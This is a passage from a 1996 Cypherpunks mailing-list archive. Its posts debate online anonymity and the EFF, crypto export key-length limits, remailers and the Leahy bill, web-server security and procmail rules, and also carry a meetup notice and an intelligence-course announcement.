in thinking, imho. there is nothing at stake here on this mailing
list except reputations and egos. but far more is at stake
in the "real world" and the risks posed by anonymity will be
adequately diluted because of this. and it won't be by people
who are all "f***ing statists"-- it will be by reasonable people
such as those who head EFF, who are interested in a civilized
society.

"cryptoanarchy"--? if what is being connoted by this is no one knowing
anyone else's true identity-- sure, in places, if you go looking for them. 
but it will be the invisible underside, not the mainstream of society.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Thu, 5 Sep 1996 03:52:11 +0800
To: cypherpunks@toad.com
Subject: Re: rc2 export limits..
Message-ID: <199609041606.MAA20510@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

stewarts@ix.netcom.com wrote:

> However, the usual guidelines for systems like RC2 and RC4 is
> 40-bit keys, and RSA keys up to 512 bits for encrypting
> session keys and 1024 bits for signatures

Can you list a source for the 1024-bit signature restriction?  I know
about the 40-bit RC2/RC4 and 512-bit public encryption keys because they
are specifically addressed in the State Dept's "Procedure for Submitting
a Commodity Jurisdiction Request for a Mass Market Software Product that
Contains Encryption".  However, digital signatures are not mentioned in
this procedure.  I can't image what justificication could be used to
restrict the strength of digital signatures.

Kent

- ------------------------------------------------------------
Puffer & CryptaPix available from http://execpc.com/~kbriggs
- ------------------------------------------------------------
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMi2o9SoZzwIn1bdtAQEBoAF+PjxvtAuPUnlMr9UGoIYhjgjPQ0Bs0GeE
5077GFz/pASkMfFvsh5uO6I9BBtpGMpI
=P92s
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 5 Sep 1996 04:20:04 +0800
To: cypherpunks@toad.com
Subject: Re: Letter to the Observer [re: Internet paedophile]
Message-ID: <9609041639.AA25461@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Sep 96 at 5:41, Martin Minow wrote:

> Forwarded to me by a friend:

> The following letters were delivered to the Editor of the Observer
> last week as a request to publish a retraction of their article
> relating to the Internet that appeared on Sunday 25th. August.

One way to limit or retaliate against diffamation would be to refuse 
internet access to anybody known to be part of any such medias, being 
tv or paper.

ISPs would probably easily agree since the revenues coming from
journalists vs from the general population is probably minuscule. Of
course, the conventionnal media would set up their own ISP but they
could be identified.

Does that makes sense or am I out to lunch?

jfa

Jean-Francois Avon 
 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Thu, 5 Sep 1996 04:27:31 +0800
To: Martin Minow <minow@apple.com>
Subject: [troll] Re: Workers of the Web, UNITE!
Message-ID: <9609041643.AA25642@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  4 Sep 96 at 6:38, Martin Minow wrote:

> >Tired: Libertarian cypherpunks
> >Wired: Crypto-socialists
> >
> The Wobblies are a prime example of Tom Leherer's comment:
> "They won all of the battles, but we had all the good songs."
> Up the Revolution.
> Martin (crypto social democrat)

Minow?  What is a missing "n" on the net?  Everybody makes typos 
nowadays...

Minow? Sound like a little living thing used as a lure on a troll, 
isn't it?

jfa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Claborne <claborne@CYBERTHOUGHT.com>
Date: Thu, 5 Sep 1996 07:38:18 +0800
To: mthompso@qualcomm.com
Subject: San Diego CPunk Physical meeting this Thursday
Message-ID: <2.2.32.19960904195619.002c4b20@cyberthought.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----


<<<<< NOTE! I have a new address!!! >>>>>>

This Thursday!!!

San Diego Area CPUNKS symposium  Thursday, Sep. 5, 1996.

   Invitation to all Cypherpunks to join the San Diego crowd at "The Mission
Cafe & Coffee Shop".  We discuss cryptography and other related subjects, have
the special cypherpunk dinner, and unwind after a long day at the grind stone.

   Don't forget to bring your public key  fingerprint.  If you can figure out
how to get it on the back of a business card, that would be cool.  If you want
the suspicious crowd there to sign your key, bring two forms of ID.

Hopefully Lance Cottrell will give us an update on Mixmaster and what's going
on at San Diego's best ISP.  You can also get the scoop on why I resigned from
NCR.  It wouldn't of course be because someone freaked out when I forwarded the
cypherpunk e-mail titled "How to become in international Arms trafficker"...

Place: The Mission Cafe & Coffee Shop
       3795 Mission Bl in Mission Beach.
       488-9060


Time:1800

Their Directions:
	8 west to Mission Beach Ingram Exit
	Take west mission bay drive
	Go right on Mission Blvd.

	On the corner of San Jose and mission blvd.
	It is located between roller coaster and garnett.
	It's kind of 40s looking building...  funky looking 
        (their description, not mine)

They serve stuff to eat, coffee stuff, and beer.

See you there!

New guy, bring your fingerprint.

Drop me a note if you plan to attend... 

NOTE: My primary e-mail address has changed to use my own domain.  You can 
reach me at "claborne@cyberthought.com". Permanently replace any other address
that you may have for me.  I am currently not subscribed to the CP list since
my current internet connection is slow (I can't afford anything right now :)

     2
 -- C  --


-----BEGIN PGP SIGNATURE-----
Version: 4.0 Personal Edition

iQEVAgUBMi3ezYP1MBWQ+9udAQE/QAf/W/tdXCFx57p17tlXT0WbtZHPK2riMC2j
5golSBxmP5t0X6SbM0DYz9b8kq6FWrqTJ9hVKQhGHiiZVqRo6AcbYM9SlFM54x6E
TFMKB6WzBp7h2DPqAeFZKuP2yGIhZaMns8fDS4EZIYHeH63DjEuhmwtM//iGe9KI
txHFiQUKi0cQWGNfqeowpESfbO0HppFbsmgj9z9KTg2gFRpPpXQLP3vXJ9Dg0/IK
gd5AiT+BTE2OOORS3OCmIUTC3vDI1acu/d2MNVOFuIBOkwH5y/mGf1pMndIW0++v
eC+3j27wJyUbSumxM6+iVn+gu0mE7QB6YPllB9FbihkYNNfzWejyuA==
=obLu
-----END PGP SIGNATURE-----
                              ...  __o
                             ..   -\<,
Claborne@CYBERTHOUGHT.com    ...(*)/(*)._ Providing thoughts on 
					  your computing problems.
http://www.CYBERTHOUGHT.com/cyberthought/
PGP Pub Key fingerprint =  7E BF 38 3F 24 A7 D1 B0  54 44 96 AA 10 D0 5D 51
Avail on Pub Key server.  PGP-encrypted e-mail welcome!
Dreams.  They are just a "screen saver" for the brain.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: smith@sctc.com (Rick Smith)
Date: Thu, 5 Sep 1996 06:36:01 +0800
To: snow <snow@smoke.suba.com>
Subject: Protecting Web servers (was: Moscowchannel.com hack)
Message-ID: <v01540b05ae5385ae910d@[172.17.1.61]>
MIME-Version: 1.0
Content-Type: text/plain


>     Could you illuminate me on this subject please? I am working with a
>potential client who may need a fairly secure web server.

Years ago, the government published some criteria for highly secure
systems, notably the TCSEC or "Orange Book," which described requirements
for protecting classified information on a timesharing system with
uncleared users. Several vendors managed to build such systems, though very
few were judged secure enough to really protect classified data from
uncleared users.

However, the underlying mechanisms of "mandatory access control" do manage
to block a range of sophisticated attacks against the host computer. These
are the systems given the various B and A ratings: B1, B2, B3, A1 (in
ascending order of security). Also-ran systems that can keep honest people
from tripping over one another were given "C" ratings, though "C2" is all
you see any more.

A few vendors are putting Web servers and such on systems with mandatory
protection. I've heard talk of it from SecureWare, HP, Harris, and AT&T
using B1 or B1-like systems. Pardon the plug, but our Sidewinder also hosts
a protected Web server and uses mandatory protection to prevent Internet
attacks from damaging it.

In practice, I've found that most customers just want to demonstrate "due
diligence" regarding security. They pick up whatever's popular in the
marketplace that has some pretention of strong security ("We're C2 rated by
the government!!"). It's a rare customer that actually takes the time to
look at the security issues and consider whether they might need what
mandatory protection provides.

Rick.
smith@sctc.com             secure computing corporation






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Martin Janzen <janzen@idacom.hp.com>
Date: Thu, 5 Sep 1996 07:47:56 +0800
To: adam@homeport.org (Adam Shostack)
Subject: Re: How to use procmail
In-Reply-To: <199609042119.QAA06971@homeport.org>
Message-ID: <9609042045.AA27973@sabel.idacom.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


Adam Shostack writes:

> Rule introductions  of the form :# are depreciated.  You should always
> use :0, which means any line starting with * is a rule.
> [...]
> And :0: means use a lockfile on the folder.
> [...]
> :0
> *^Subject:.*unsub
> /dev/null

> :0:
> *^TOcypherpunks
> cypherpunks

Thanks, Adam.  I created my .procmailrc a long time ago, using the
old 2.?? version, and now just cut and paste as required.

New procmail users, listen to Adam!  (And read the man page, even
though it's a bit intimidating at first.)

MJ




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com
Date: Thu, 5 Sep 1996 08:04:30 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Anonymity (re: the Esther Dyson issue)
Message-ID: <9609042054.AB16740@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


In Tim's Cyphernomicon, he says
        - I have heard (no cites) that "going masked for the purpose
              of going masked" is illegal in many jurisdictions. Hard to
              believe, as many other disguises are just as effective and
              are presumably not outlawed (wigs, mustaches, makeup,
              etc.). I assume the law has to do with people wearning ski
              masks and such in "inappropriate" places. Bad law, if real.

A lot of the motivation was to stop the Ku Klux Klan terrorism.
On the other hand, the reason it was mentioned on the list a couple
years ago was that a woman was arrested in some North Central city,
probably Detroit, for violating it, because she was wearing a
Middle-Eastern-style chador outfit that covered her face.

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 08:34:30 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
Message-ID: <v02130501ae53380722b2@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Vladimir Z. Nuri wrote:
>so in a very real sense, anonymity in
>the phone system was considered a "problem" by some that has been
>"solved" or "modified" by some recent advancements. (yes, most people
>agree caller ID is an advancement).

Yes, and that is why some companies (e.g., Private Lines) offer anonymous
out-bound calling services.

>
>I think cpunks should hold the view that communication is a matter
>of mutual consent between sender and receiver. if a receiver says,
>"I don't want any anonymous messages", then should be able to block them.
>this is essentially what is happening with the remailers *right*now*,
>if you ask any remailer operator. people ask not to receive anonymous
>mail, and are put on the blocking lists. imho only the extremists are arguing,
>and have always argued, that they should have some ability to put
>an anonymous message in front of someone else against their will.
>
>this basic rule becomes more murky when you look at public forums,
>because you can't really say whether given individuals reading them want to
>hear something anonymous or not. by designing the forum beforehand
>to force the situation, you solve this problem.
>

I find most unwanted communications objectionable, anonymous or not. How
about billboards.  Should the fact that I choose to be outside or on a
roadway make my eye a target for ads? (If so, then why not consider having
an e-mail account in a similar vein?)  The fact that I can immediately, or
later, identify the responsible party doesn't keep me from initially seeing
the ad and taking my time.  If I object, what are my alternatives?  The
last thing I want is monetary compensation.  I want my time back.  Failing
this, I want the abusers time (sorta' like in Zardoz).


>I do believe that in the future there will be all types of forums: those in
>which identity is required, those in which it is optional, and those in
>which it is always cloaked. this is eminently reasonable imho.
>those who argue against one of the
>above's existence (such as saying it involves a ghettoization
>of anonymity, that there should always be an ability to be anonymous
>in any communication setting) are extremists imho.

"The reasonable man adapts himself to the world: the unreasonable
one persists in trying to adapt the world to himself.
Therefore all progress depends on the unreasonable man."
--George Bernard Shaw



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 08:52:52 +0800
To: cypherpunks@toad.com
Subject: Re: flimflamery on anonymity
Message-ID: <v02130504ae5340b92dde@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>Vladimir Z. Nuri wrote:
>(last line is sarcasm for the sarcasm impaired)
>a cpunk position I have seen repeated often. it goes along a very
>simplistic line of reasoning that I have seen TCM evoke repeatedly.
>it rather annoys me. it goes like this:
>
>cyberspace is merely discussion between people. anonymity should
>be allowed anywhere there are discussions (its a free speech issue).
>therefore it should be possible everywhere in cyberspace.
>
>this idea lacks a lot of subtlety in thought and to my mind is
>tremendously simplistic.
[snip]
>
>cpunks will also argue that anonymity can suffice for any
>business transaction. that may be so, but what about a business
>that simply says, "we choose to require identity among our
>customers, and you can go elsewhere if you disagree".

These attitudes create business opportunities for others who would seek to
serve those who prefer anonymity.

[snip]
>
>cyberspace as a whole is *not* going to lead to a totlal motion
>away from physical identity. in some ways physical identity will
>be more strictly enforced in cyberspace, in "some regions".
>there will be other regions of cyberspace in which "anything goes".
>

As long as attractive, anonymous, alternatives sufficient for those (of a
'cyherpunk' mind) seeking to communicate, transact commerce, etc. exist it
won't matter to whether others choose to enforce stricter identity
adherence.

[snip]

>of course in the cpunk mailing list, who cares if there are
>anonymous/pseudonymous participants? [snip]... but far more is at stake
>in the "real world" and the risks posed by anonymity will be
>adequately diluted because of this. and it won't be by people
>who are all "f***ing statists"-- it will be by reasonable people
>such as those who head EFF, who are interested in a civilized
>society.
>

As always the market and the street will decide.



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stephen Charchuk <nosferat@atcon.com>
Date: Thu, 5 Sep 1996 05:35:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <MAPI.Id.0016.006f7366657261743030303830303038@MAPI.to.RFC822>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Thu, 5 Sep 1996 09:10:36 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: Letter to the Observer [re: Internet paedophile]
In-Reply-To: <9609041639.AA25461@cti02.citenet.net>
Message-ID: <Pine.SUN.3.91.960904144025.27739M-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois, your comments are inspired!

As a member of "such media" in that I still publish articles on dead trees
-- I have articles in fall issues of Wired and Playboy, for instance -- I
rejoice in your reasoned suggestion that you deny me and my ilk access to 
the Net.

But wait! I connect through wired.com, eff.org, or *.edu accounts. How do 
you plan to kick me off my "ISPs?"

No, you're not out to lunch.

-Declan


On Wed, 4 Sep 1996, Jean-Francois Avon wrote:
> 
> One way to limit or retaliate against diffamation would be to refuse 
> internet access to anybody known to be part of any such medias, being 
> tv or paper.
> 
> ISPs would probably easily agree since the revenues coming from
> journalists vs from the general population is probably minuscule. Of
> course, the conventionnal media would set up their own ISP but they
> could be identified.
> 
> Does that makes sense or am I out to lunch?
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Thu, 5 Sep 1996 09:31:41 +0800
To: "James A. Donald" <stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: What is the EFF doing exactly?
Message-ID: <2.2.16.19960904170224.40bfe688@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:02 PM 9/3/96 -0700, James A. Donald wrote:
>At 03:17 PM 9/3/96 -0700, Jon Lebkowsky wrote:
>>>> Not necessarily. The character of the anonymous speech is decisive. If you
>>>> use anonymity to cloak harassment, for instance, the anonymity (which
>>>> removes accountability) is a problem.  The accountability issue is real and
>>>> should be addressed, not evaded.
>
>At 07:44 AM 9/3/96 -0700, James A. Donald wrote:
>>>No:  The harassment is the problem, not the anonymity that makes it
>>>possible.
>
>At 06:52 AM 9/4/96 -0500, Jon Lebkowsky wrote:
>>The harassment is one problem, the lack of accountability another. 
>
>So:  
>
>Lucky Green and Dark Unicorn are not accountable.  This is a problem?
>
>Because it is a problem "We" need to do something about it, 

Looks like you didn't quite finish yer msg...what is it that "We" need to do
about it?

--
Jon Lebkowsky           http://www.well.com/~jonl              jonl@hotwired.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 09:51:08 +0800
To: cypherpunks@toad.com
Subject: Intelligence Community Briefing
Message-ID: <v02130505ae5349001fb3@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


My security clearence has long since expired. Anyone on the list plan to
attend and report back :-)
------------------------------------

AFCEA

The U.S. Intelligence Community:  Who Does What, With What, For What?

October 8, 9, 10, 1996

#### This course is Classified SECRET. ###

Sponsored by The Community Management Staff.

Location:  AFCEA International Headquarters, Fairfax, Virginia

The U.S. Intelligence Community continues to undergo substantial changes.
This top-down course provides an up-to-date understanding of the structure
and functions of the Intelligence Community and its components, the changing
threats and challenges with which they must deal, as well as resources and
processes used.  The course addresses intelligence programs structure and
provides insight into relations between intelligence producers and policy
consumers, as well as useful information about the interaction between U.S.
Intelligence and industry.

WHO SHOULD ATTEND
This course is suitable for industry managers, designers and producers of
security and intelligence systems and products, including software and
special purpose products.  The up-to-date coverage of the changing
intelligence community is equally suitable for intelligence officers and
operatives proficient in their own services or specialties who have or expect
to have responsibilities involving other agencies and services, overview
functions or supervision of interfaces between various agency efforts.  Past
attendance has been divided about equally between persons from the government
and from industry.

COURSE OUTLINE:
Intelligence, Practice and Issues
        Background of U.S. Intelligence
        Definitions of Intelligence
        Intelligence Process
        Relationships between Intelligence and Policy Systems
        Intelligence Issues
Components and Coordination of the Intelligence Community
        Organization and Components of the U.S. Intelligence Community
        The Role of the DCI
        DCI Special Staffs and Multi-Agency Activity Centers
        The Community Management Executive Director and Staff
        The National Intelligence Council
        Intelligence Oversight and Management within the Executive Branch
        Civilian Intelligence Organizations
        Military Intelligence Components
        Coordination of Counterintelligence
Intelligence Budget Structure
        NFIP
        TIARA
        JMIP
The Central Intelligence Agency
        Structure and Functions of the Changing CIA
        Intelligence Collection, Analysis and Dissemination
        CIA Support to Military Intelligence
        Operations
Military Intelligence
        OASDC3I Organization and Functions
        Structure and Functions of the Defense Intelligence Agency
        Support for OSD, JCS, and Operational Commands
        Military Services:  Organization, Roles and Missions
        Impact and Trends Resulting from Changing World Situation and
Operational
Experiences
Overhead Reconnaissance and Surveillance
        National Reconnaissance Office
        Defense Airborne Reconnaissance
The National Security Agency and Central Security Service
        Role in the Community
        Specific Functions
        Services of Common Concern
Federal Bureau of Investigation
        FBI Organization and Functions
        Law Enforcement
        Intelligence Functions
        Counter-Intelligence
        Relationships with CIA and Other Components of the Intelligence
Community
Counternarcotics Intelligence and the Drug Enforcement Administration
        The Problem
        The Counternarcotics Community
        DCI Counternarcotics Center
        Operational Counternarcotics Intelligence Activities
Imagery
        The Central Imagery Office
        Relationships with Other Parts of the Intelligence Community
        Support to Operational Commands
Intelligence Support for Arms Control and Disarmament
        Arms Control Intelligence Staff
        Non-Proliferation Center
        On-Site Inspections
        Nuclear Intelligence and Role of Department of Energy
Intelligence Community and the Congress
        Functions of the Oversight Committees
        Legislation Affecting the Intelligence Community
        Trends
Intelligence and Industry
        Relationship Between Intelligence Components and the Private Sector
                Opportunities to Market Services and Products
                Control Mechanisms
                Business Strategies
        Intelligence Developments in Private Industry
                Internal Intelligence System
                Risk Analysis
Course Coordinator
COL John D. Sitterson, USA (Ret.), is now a consultant to AFCEA and industry.
 His military career included assignments in intelligence and international
security affairs, as well as combat and commands with extensive C3I
involvement.  He headed the Department of National and International Security
Studies at the Army War College.  Colonel Sitterson served on a White House
Task Force, in operations coordinating elements under NSA, on a
Presidential-Congressional Commission, and as a military member of two blue
ribbon study groups at the Council on Foreign Relations.  As a civilian he
served 20 years in defense-related government and industry positions,
including 11 years with HRB-Singer (now HRB Systems).

Lecturers:
Mr. Peter C. Oleson has had extensive experience in intelligence related
positions in the U.S. government and industry, including the Office of the
Secretary of Defense.  He has been adjunct professor of Resource Management
at the Defense Intelligence College.  He now heads his own consulting firm.

Other lecturers will be authoritative representatives of the Central
Intelligence Agency; Community Management Staff; the Office of the Assistant
Secretary of Defense (C3I); Defense Intelligence Agency; National Security
Agency; Intelligence Services of the Army, Navy, Air Force and Marine Corps;
the National Reconnaissance Office; the Defense Airborne Reconnaissance
Office; the Central Imagery Office; Department of State (INR); Department of
Energy; Federal Bureau of Investigation; Drug Enforcement Administration;
Arms Control Intelligence Staff; Non-Proliferation Center and the House of
Representatives Permanent Select Committee on Intelligence.

Register by submitting the following information to:
AFCEA
4400 Fair Lakes Court
Fairfax, Virginia 22033-3899

Phone: (703) 631-6135   FAX (703) 631 4693



email = aafceapdc@aol.com until 1 October and then pdc@afcea.org

Course Name or Number: Intelligence Course/ 203N
Date Course Convenes: 8 October 1996
STUDENT:
Rank/Honorific:
Service:
First Name:
MI:
Last Name:
Title/Position:
Company/Organization:
Division:
Mail Stop/ Suite/ Office Symbol:
Street Address:
City:
State:
ZIP:
Country
Telephone: (area code)
Fax: (area code)

Please indicate method of payment intended:
Mastercard/Visa/AMEX/Diners Club/ DD1556/Voucher

        All registrations will be acknowledged. The acknowledgement letter will
contain information on location of the course, housing and transportation
details.

Fees:   Government Personnel            $700
        Industry                                $950

###     A Classified Visit Request must be submitted by mail or fax before the
student is permitted to attend the course. This request should be received at
AFCEA at least the week before the class convenes.
-------------------------



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 5 Sep 1996 10:03:26 +0800
To: cypherpunks@toad.com
Subject: Re: Race Bit: C
Message-ID: <199609042222.PAA19090@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:47 AM 9/4/96 -0700, Timothy C. May wrote:
>At 3:02 AM 9/4/96, James A. Donald wrote:
>>At 10:33 PM 9/3/96 -0800, jim bell wrote:
>>>>The Leahy crypto bill introduced early this year made (paraphrasing) "the
>>>>use of encryption to thwart a law-enforcement investigation illegal."  I
>>>>immediately pointed out that while this wouldn't make _encrypted_ remailers
>>>>illegal, per se,  effectively it would because the moment an investigation
>>>>(even a phony or trumped-up one) is started and is "thwarted" by the
>>>>encryption used, the remailer operator became guilty of a crime.
>...
>>I believe that judges have a policy of interpreting deliberately
>>ambiguous statutes in whatever way makes the most sense.  The only
>>sensible interpretation of Leahy's bill is that it criminalizes
>>strong remailers, that it is intended to punish ANYONE, not just
>>the criminals themselves, who obstructs investigations.
>
>As the recent discussion of knives, switchblades, and throwing stars
>showed, such ambiguous laws are often used to keep the coloreds down.

Perhaps the most ominous part of making "use of encryption to thwart an 
investigation" illegal is _not_ that remailer operators might be prosecuted, 
but that they might NOT be prosecuted in a deal where (in exchange for not 
being prosecuted) they continue to operate the remailer, "cracked" or 
sabotaged so that they share all the info with the cops.  While even that 
won't make chained remailers totally useless, eventually suspicions of such 
a crack will surface, which will help sabotage the credibility of all remailers, 
not just the ones that have been "stung."  

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Surya Koneru <surya@premenos.com>
Date: Thu, 5 Sep 1996 11:34:30 +0800
To: "'cypherpunks@toad.com>
Subject: RE: rc2 export limits..
Message-ID: <c=US%a=_%p=Premenos_Corp%l=KI-960904222454Z-7@ki.premenos.com>
MIME-Version: 1.0
Content-Type: text/plain


RC2 uses a effective key size, so is it ok to use a key of 128 bits size
with a 40 bits effective key size for export.

Thanx
--Surya

>----------
>From: 	Simon Spero[SMTP:ses@tipper.oit.unc.edu]
>Sent: 	Tuesday, September 03, 1996 8:33 PM
>To: 	Surya Koneru
>Cc: 	'cypherpunks@toad.com'
>Subject: 	Re: rc2 export limits..
>
>It's the usual - if you want commercial jurisdiction, 
>	40 bits unescrowed
>	64 bits (16 escrowed) 
>
>Above that, you'll have to go through state on a per customer basis 
>(which I don't think is that easy to get if software is being shipped 
>outside the US, and is definitely going to be expensive.)
>
>Simon
>
>
>---
>Cause maybe  (maybe)		      | In my mind I'm going to Carolina
>you're gonna be the one that saves me | - back in Chapel Hill May 16th.
>And after all			      | Email address remains unchanged
>You're my firewall -    	      | ........First in Usenet.........
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 5 Sep 1996 07:03:02 +0800
To: Ulf Moeller <um@c2.net>
Subject: Re: EFF chairwoman: Anonymity proven not to be a positive factor
In-Reply-To: <m0uxezC-0000ArC@ulf.mali.sub.org>
Message-ID: <Pine.SUN.3.94.960904153710.187A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 2 Sep 1996, Ulf Moeller wrote:

> >From a Scientology magazine:
> 
>    Esther Dyson, member of the board of directors of the Electronic
>    Frontier Foundation and member of the National Information
>    Infrastructure Advisory Council, spoke on the anonymity issue at the
>    fifth Computers, Freedom & Privacy (CFP) conference in San Francisco.
> 
> [...]
>                                       "I have a concern about the spread
>    of bad behavior on the Net," said Dyson. "Anonymity figures into this,
>    and I feel that it has proven to not be a positive factor. It breaks
>    down the community which we are seeking to build, and cout protection
>    and privacy laws already exist and should be applied in a broad way,
>    such that they are transparent to new wrinkles in the technology. It
>    is not necessary to view the world of the Net as different from the
>    rest of the world."

I think EFF needs to make attempts to clear up this mess.

> 
> http://www.anonymizer.com:8080/http://www.theta.com/goodman/hijack.htm
> 
> 
> [For EFF's former position on anonymity, see
> http://ftp.sterling.com:80/COAST/doc/law+ethics/EFF-Anonymity]
> 

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Thu, 5 Sep 1996 09:57:10 +0800
To: cypherpunks@toad.com
Subject: Reputations
Message-ID: <v02130500ae5350144f63@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


"Regulation - which is based on force and fear - undermines the moral base
of business dealings. It becomes cheaper to bribe a building inspector than
to meet his standards of construction. A fly-by-night securities operator
can quickly meet all the S.E.C. requirements, gain the inference of
respectability, and proceed to fleece the public. In an unregulated
economy, the operator would have had to spend a number of years in
reputable dealings before he could earn a position of trust sufficient to
induce a number of investors to place funds with him. Protection of the
consumer by regulation is thus illusory."

  -- Alan Greenspan

TCM, seems like a reputable source to support your views.

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Thu, 5 Sep 1996 07:33:26 +0800
To: Jon Lebkowsky <jonl@well.com>
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <2.2.32.19960903115249.006e7bfc@mail.well.com>
Message-ID: <Pine.SUN.3.94.960904155603.739C-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 3 Sep 1996, Jon Lebkowsky wrote:

> "Uncompromising" is not an "element of legislative influence," at least not
> on this planet.

Explain that to the tobbacco lobby.

--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Douglas R. Floyd" <dfloyd@io.com>
Date: Thu, 5 Sep 1996 08:55:30 +0800
To: jf_avon@citenet.net
Subject: Re: Letter to the Observer [re: Internet paedophile]
In-Reply-To: <9609041639.AA25461@cti02.citenet.net>
Message-ID: <199609042131.QAA02995@xanadu.io.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On  4 Sep 96 at 5:41, Martin Minow wrote:
> 
> > Forwarded to me by a friend:
> 
> > The following letters were delivered to the Editor of the Observer
> > last week as a request to publish a retraction of their article
> > relating to the Internet that appeared on Sunday 25th. August.
> 
> One way to limit or retaliate against diffamation would be to refuse 
> internet access to anybody known to be part of any such medias, being 
> tv or paper.
> 
> ISPs would probably easily agree since the revenues coming from
> journalists vs from the general population is probably minuscule. Of
> course, the conventionnal media would set up their own ISP but they
> could be identified.
> 
> Does that makes sense or am I out to lunch?

AOL will take them.  Most of them are on there anyway.

> 
> jfa
> 
> Jean-Francois Avon 
